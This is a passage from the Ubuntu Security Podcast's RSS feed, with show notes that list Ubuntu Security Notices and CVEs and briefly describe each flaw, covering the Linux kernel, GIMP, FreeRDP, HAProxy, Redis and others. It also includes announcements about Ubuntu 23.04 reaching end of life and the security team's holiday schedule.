<li>Ubuntu specific issue - fixed by extending GNOME settings to check both the
service and the socket (since it is still a legitimate configuration to use
the service over the socket in recent Ubuntu releases)</li>
<li>Also backported to older releases since it is also a supported configuration
there to use socket activation (although the sysadmin has to set this up
themselves)</li>
</ul>
<h3 id="usn-6553-1-pydantic-vulnerability--17-49">[<a href="https://ubuntu.com/security/notices/USN-6553-1">USN-6553-1</a>] Pydantic vulnerability (17:49)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29510">CVE-2021-29510</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python data validation library</li>
<li>CPU-based DoS since if passed the value of &ldquo;infinity&rdquo; to the validator to be
parsed as a date/datetime, would result in an infinite loop</li>
</ul>
<h3 id="usn-6536-1-linux-kernel-vulnerabilities--18-10">[<a href="https://ubuntu.com/security/notices/USN-6536-1">USN-6536-1</a>] Linux kernel vulnerabilities (18:10)</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5178">CVE-2023-5178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5158">CVE-2023-5158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45898">CVE-2023-45898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6537-1-linux-kernel--gcp--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6537-1">USN-6537-1</a>] Linux kernel (GCP) vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5633">CVE-2023-5633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5345">CVE-2023-5345</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5178">CVE-2023-5178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5158">CVE-2023-5158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5090">CVE-2023-5090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45898">CVE-2023-45898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4244">CVE-2023-4244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6548-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6548-1">USN-6548-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6176">CVE-2023-6176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5178">CVE-2023-5178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39194">CVE-2023-39194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39193">CVE-2023-39193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39192">CVE-2023-39192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37453">CVE-2023-37453</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3006">CVE-2023-3006</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6549-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6549-1">USN-6549-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5178">CVE-2023-5178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5158">CVE-2023-5158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39198">CVE-2023-39198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39194">CVE-2023-39194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39193">CVE-2023-39193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39192">CVE-2023-39192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3773">CVE-2023-3773</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37453">CVE-2023-37453</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6534-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6534-2">USN-6534-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6039">CVE-2023-6039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5178">CVE-2023-5178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5158">CVE-2023-5158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39198">CVE-2023-39198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39194">CVE-2023-39194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39193">CVE-2023-39193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39192">CVE-2023-39192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3773">CVE-2023-3773</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37453">CVE-2023-37453</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6549-2-linux-kernel--gke--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6549-2">USN-6549-2</a>] Linux kernel (GKE) vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5178">CVE-2023-5178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5158">CVE-2023-5158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39198">CVE-2023-39198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39194">CVE-2023-39194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39193">CVE-2023-39193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39192">CVE-2023-39192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3773">CVE-2023-3773</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37453">CVE-2023-37453</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6548-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6548-2">USN-6548-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6176">CVE-2023-6176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5178">CVE-2023-5178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39194">CVE-2023-39194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39193">CVE-2023-39193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39192">CVE-2023-39192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37453">CVE-2023-37453</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3006">CVE-2023-3006</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-23-dot-04--lunar-lobster--approaching-eol--18-48">Ubuntu 23.04 (Lunar Lobster) approaching EOL (18:48)</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2023-December/007974.html">https://lists.ubuntu.com/archives/ubuntu-security-announce/2023-December/007974.html</a></li>
<li>Interim releases receive 9 months of support</li>
<li>Lunar reaches EOL on 25th January</li>
<li>Good opportunity over the holiday break to upgrade to 23.10 (Mantic)
<ul>
<li><a href="https://help.ubuntu.com/community/ManticUpgrades">https://help.ubuntu.com/community/ManticUpgrades</a></li>
</ul>
</li>
</ul>
<h3 id="ubuntu-security-team--and-rest-of-canonical--on-break-till-early-january-2024--19-33">Ubuntu Security team (and rest of Canonical) on break till early January 2024 (19:33)</h3>
<ul>
<li>Various members of the team will be checking in each day to look for any
serious issues</li>
<li>Not planning any new security update releases during this time unless
something major happens (we are still wincing from Log4Shell - <a href="/episode-142/#log4shell-explodes-the-internet-04-20">Log4Shell
explodes the internet from Episode 142 in late December 2022</a>)</li>
<li>As usual, contact us via the normal means if something is particularly urgent
and someone should respond</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E216.mp3" length="21878509" type="audio/mpeg" /><itunes:duration>1276</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 215
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-215/</link>
          <pubDate>Fri, 08 Dec 2023 16:42:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>d1ed0d34ae279ec4d228d795a2fff1b818fcf258f34117ca5ce17e66b17f1e96fa0da194506d0741aefda6f0a6ea00281fbb1dfeca418c2fab8cb62a5f0b99d6</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 215</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Mark Esler is our special guest on the podcast this week to discuss the
  OpenSSF's Compiler Options Hardening Guide for C/C++ plus we cover
  vulnerabilities and updates for GIMP, FreeRDP, GStreamer, HAProxy and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Mark Esler is our special guest on the podcast this week to discuss the
  OpenSSF's Compiler Options Hardening Guide for C/C++ plus we cover
  vulnerabilities and updates for GIMP, FreeRDP, GStreamer, HAProxy and more.
  </itunes:summary>
        <description>  Mark Esler is our special guest on the podcast this week to discuss the
  OpenSSF's Compiler Options Hardening Guide for C/C++ plus we cover
  vulnerabilities and updates for GIMP, FreeRDP, GStreamer, HAProxy and more.
  </description>
        <googleplay:description>  Mark Esler is our special guest on the podcast this week to discuss the
  OpenSSF's Compiler Options Hardening Guide for C/C++ plus we cover
  vulnerabilities and updates for GIMP, FreeRDP, GStreamer, HAProxy and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Mark Esler is our special guest on the podcast this week to discuss the
OpenSSF&rsquo;s Compiler Options Hardening Guide for C/C++ plus we cover
vulnerabilities and updates for GIMP, FreeRDP, GStreamer, HAProxy and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>65 unique CVEs addressed</p>
<h3 id="usn-6521-1-gimp-vulnerabilities--00-50">[<a href="https://ubuntu.com/security/notices/USN-6521-1">USN-6521-1</a>] GIMP vulnerabilities (00:50)</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-44444">CVE-2023-44444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-44443">CVE-2023-44443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-44442">CVE-2023-44442</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-44441">CVE-2023-44441</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32990">CVE-2022-32990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30067">CVE-2022-30067</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Includes 4 recent issues disclosed via Trend&rsquo;s ZDI - all found by the same
researcher - 2 heap buffer overflows in DDS and PSD parsers, ab integer
overflow and a separate off-by-one error in the PSP parser which could
apparently lead to remote code execution plus a couple DoS related issues
(unhandled exception and an excessive memory allocation) - both leading to a
crash</li>
</ul>
<h3 id="usn-6522-1-freerdp-vulnerabilities--01-39">[<a href="https://ubuntu.com/security/notices/USN-6522-1">USN-6522-1</a>] FreeRDP vulnerabilities (01:39)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-39356">CVE-2023-39356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39352">CVE-2023-39352</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41877">CVE-2022-41877</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Windows RDP client</li>
<li>Malicious server could send a crafted drive redirect to the client -
triggering an OOB read, causing the client to disclose memory contents and
therefore possibly sensitive info to the server</li>
<li>Plus an OOB write and an OOB read on crafted image data - both also likely
leading to a crash</li>
</ul>
<h3 id="usn-6523-1-u-boot-nezha-vulnerability--02-19">[<a href="https://ubuntu.com/security/notices/USN-6523-1">USN-6523-1</a>] u-boot-nezha vulnerability (02:19)</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-30790">CVE-2022-30790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30552">CVE-2022-30552</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2347">CVE-2022-2347</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>u-boot for the Allwinner Nezha RISC-V board</li>
<li>Missing length checks in DFU parser -&gt; heap buffer overflow</li>
<li>2 other buffer overflows when handling fragmented IP packets</li>
</ul>
<h3 id="usn-6524-1-pypy-vulnerability--03-06">[<a href="https://ubuntu.com/security/notices/USN-6524-1">USN-6524-1</a>] PyPy vulnerability (03:06)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37454">CVE-2022-37454</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow leading to a buffer overflow in SHA3 - comes from the
original reference implementation of SHA3</li>
<li>Has affected a range of packages in Ubuntu
<ul>
<li>PHP, Python itself and now PyPy</li>
</ul>
</li>
</ul>
<h3 id="usn-6525-1-pysha3-vulnerability--03-06">[<a href="https://ubuntu.com/security/notices/USN-6525-1">USN-6525-1</a>] pysha3 vulnerability (03:06)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37454">CVE-2022-37454</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Same as above</li>
</ul>
<h3 id="usn-6519-2-ec2-hibagent-update">[<a href="https://ubuntu.com/security/notices/USN-6519-2">USN-6519-2</a>] EC2 hibagent update</h3>
<ul>
<li>Affecting Xenial ESM (16.04 ESM)</li>
</ul>
<h3 id="usn-6526-1-gstreamer-bad-plugins-vulnerabilities--03-16">[<a href="https://ubuntu.com/security/notices/USN-6526-1">USN-6526-1</a>] GStreamer Bad Plugins vulnerabilities (03:16)</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-44446">CVE-2023-44446</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-44429">CVE-2023-44429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40476">CVE-2023-40476</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40475">CVE-2023-40475</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40474">CVE-2023-40474</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37329">CVE-2023-37329</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap overflow in PGS subtitle overlay decoder</li>
<li>Various integer overflows -&gt; heap buffer overflows in MXF container handler
(Material Exchange Format) - apparently used for delivering advertisements to
TV stations and for movies in commercial theatres - specifically in handling
of files using AES3 audio</li>
<li>MXF demuxer UAF</li>
<li>AV1 buffer overflow</li>
<li>Integer overflow -&gt; stack overflow in H.256 parser</li>
</ul>
<h3 id="usn-6527-1-openjdk-vulnerabilities--04-09">[<a href="https://ubuntu.com/security/notices/USN-6527-1">USN-6527-1</a>] OpenJDK vulnerabilities (04:09)</h3>
<ul>
<li>2 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-22081">CVE-2023-22081</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22025">CVE-2023-22025</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>11.0.21 + 17.0.9</li>
</ul>
<h3 id="usn-6528-1-openjdk-8-vulnerabilities--04-25">[<a href="https://ubuntu.com/security/notices/USN-6528-1">USN-6528-1</a>] OpenJDK 8 vulnerabilities (04:25)</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-22081">CVE-2023-22081</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22067">CVE-2023-22067</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22025">CVE-2023-22025</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40433">CVE-2022-40433</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>8u392</li>
</ul>
<h3 id="usn-6509-2-firefox-regressions--04-34">[<a href="https://ubuntu.com/security/notices/USN-6509-2">USN-6509-2</a>] Firefox regressions (04:34)</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6209">CVE-2023-6209</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6208">CVE-2023-6208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6207">CVE-2023-6207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6205">CVE-2023-6205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6204">CVE-2023-6204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6213">CVE-2023-6213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6212">CVE-2023-6212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6211">CVE-2023-6211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6210">CVE-2023-6210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6206">CVE-2023-6206</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>120.0.1 - in particular includes a fix where Firefox would crash immediately
on startup but only for aarch64 (arm64) on Linux when using page sizes other
than 4K - ie. as used in Apple silicon etc</li>
</ul>
<h3 id="usn-6529-1-request-tracker-vulnerabilities--05-25">[<a href="https://ubuntu.com/security/notices/USN-6529-1">USN-6529-1</a>] Request Tracker vulnerabilities (05:25)</h3>
<ul>
<li>4 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-41260">CVE-2023-41260</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-41259">CVE-2023-41259</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25802">CVE-2022-25802</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38562">CVE-2021-38562</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible timing attack in the authentication module - could allow to enumerate
user accounts</li>
<li>XSS plus some info leaks as well</li>
</ul>
<h3 id="usn-6530-1-haproxy-vulnerability--06-12">[<a href="https://ubuntu.com/security/notices/USN-6530-1">USN-6530-1</a>] HAProxy vulnerability (06:12)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-45539">CVE-2023-45539</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mishandling of # character in URIs could allow unexpected routing of a URI
containing say <code>index.html#.png</code> to a static server (since usually is configured
to route <code>.png</code> to a static server, but in this case the request is really for
<code>index.html</code>)</li>
</ul>
<h3 id="usn-6531-1-redis-vulnerabilities--07-06">[<a href="https://ubuntu.com/security/notices/USN-6531-1">USN-6531-1</a>] Redis vulnerabilities (07:06)</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-45145">CVE-2023-45145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28856">CVE-2023-28856</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25155">CVE-2023-25155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36021">CVE-2022-36021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-35977">CVE-2022-35977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24834">CVE-2022-24834</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap overflow in cjson library able to be triggered by a Lua script -&gt; RCE</li>
<li>Race condition on setting permissions on the local unix socket - if using a
less restrictive umask could allow a local attacker to race redis on startup</li>
<li>Also various integer overflows and other issues fixed too</li>
</ul>
<h3 id="usn-6494-2-linux-kernel-vulnerabilities--08-08">[<a href="https://ubuntu.com/security/notices/USN-6494-2">USN-6494-2</a>] Linux kernel vulnerabilities (08:08)</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45862">CVE-2023-45862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39194">CVE-2023-39194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39193">CVE-2023-39193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39192">CVE-2023-39192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6495-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6495-2">USN-6495-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6496-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6496-2">USN-6496-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25775">CVE-2023-25775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6502-4-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6502-4">USN-6502-4</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5345">CVE-2023-5345</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5090">CVE-2023-5090</a> <!-- raw HTML omitted --></li>
